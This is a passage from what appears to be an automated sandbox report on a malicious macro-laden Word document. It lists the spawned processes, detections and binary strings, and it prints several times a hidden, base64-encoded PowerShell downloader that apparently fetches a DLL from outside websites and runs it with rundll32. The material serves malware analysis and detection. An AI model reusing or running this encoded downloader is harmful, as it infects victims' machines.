HoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp

Source: MAIL-0573188.doc

Initial sample: OLE summary subject = Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: MAIL-0573188.doc	Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788			Name: Owppnp8hah4xo788

Obfuscated command line found

Source: unknown

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwA